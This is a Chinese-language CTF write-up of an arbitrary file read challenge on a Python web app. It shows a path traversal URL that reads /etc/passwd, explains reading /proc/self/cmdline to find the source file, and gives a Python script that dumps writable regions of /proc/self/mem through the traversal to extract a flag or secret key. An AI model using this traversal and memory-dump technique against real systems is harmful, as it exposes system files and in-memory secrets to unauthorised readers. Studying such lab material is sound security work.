先判断这个题目是不是关于任意文件读取漏洞,读一个Linux都有的文件/etc/passwd
http://61.147.171.105:60014/info?file=../../../../../etc/passwd
../../../../../etc/passwd 是一个相对路径,用于访问文件系统中的 /etc/passwd 文件。
通过抓包发现Response中的Server是python,那说明该网站是有python运行的.既然是python,当前进程肯定是由python xxx.py启动的,只要能知道当时的命令是什么,就能获取xxx.py的名字,进而读取源码。linux确实有这么个文件,/proc/self/cmdline,用于获取当前启动进程的完整命令。
大部分的python网站脚本名都是app.py
/proc/self/maps来查看当前进程的内存映射情况
取/proc/self/maps+/proc/self/mem+SECRET_KEY的脚本,可一键获取flag.
import requests
import re
baseUrl = "http://61.147.171.105:58344/info?file=../../../../.."
if __name__ == "__main__":
url = baseUrl + "/proc/self/maps"
memInfoList = requests.get(url).text.split("\\n")
mem = ""
for i in memInfoList:
memAddress = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i)
if memAddress:
start = int(memAddress.group(1), 16)
end = int(memAddress.group(2), 16)
infoUrl = baseUrl + "/proc/self/mem&start=" + str(start) + "&end=" + str(end)
mem = requests.get(infoUrl).text
if re.findall(r"{[\w]+}", mem):
print(re.findall(r"\w+{\w+}", mem))
